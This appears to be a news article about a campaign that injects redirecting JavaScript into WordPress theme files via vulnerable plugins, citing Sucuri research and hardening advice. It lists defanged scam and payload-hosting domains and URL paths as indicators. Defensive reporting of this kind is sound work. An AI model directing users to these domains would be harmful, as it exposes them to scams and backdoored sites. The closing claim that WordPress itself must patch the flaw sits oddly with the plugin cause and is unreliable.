WordPress is experiencing yet another incident this month because of a security flaw. According to a report from researchers at Sucuri, a malicious JavaScript is being injected in compromised WordPress sites. The JavaScript is injected at the index.php theme file that then forces a redirect to a malicious website. The website is a part of what Sucuri calls a “survey-for-gifts scam,” and uses the following domains: gotosecond2[.]com, adsformarket[.]com, admarketlocation[.]com, and admarketresearch[.]xyz. While those domains are redirecting, Sucuri states that “statistic[.]admarketlocation[.]com/clockwork?&se_referrer= or track[.]admarketresearch[.]xyz/?track&se_referrer=” is loaded in the redirection process and ultimately unleashes the malicious payload to the WordPress page.
This issue is affecting at least 2,000 WordPress websites and this number is quickly climbing. Once the page in question is infected, researchers have found that there is more activity following the initial infection. This is largely due to the JavaScript payload injected during the final stage of redirection. Threat actors are able to inject more malicious code into WordPress theme files, like PHP backdoors and hack tools, in order to ensure that they maintain unmitigated access to the website.
To prevent this from occurring, Sucuri researchers recommend that website owners “disable the modification of primary folders block hackers from inserting malicious files or includes as part of WordPress security hardening and security best practices.” Looking for the root cause of all the infections, Sucuri also uncovered that there is an exploitation of “multiple plugin vulnerabilities, including vulnerable versions of Simple Fields and CP Contact Form with PayPal.”
Sucuri researchers warn that they “expect the attackers will continue to register new domains — or leverage existing unused domains — as more security vendors blacklist domains being used in this infection.” As this is the case, WordPress admins must take preemptive action to stop their website from joining the rapidly growing list of the infected. Until WordPress takes action and patches the associated security flaw, admins are on their own.
Featured image: Shutterstock
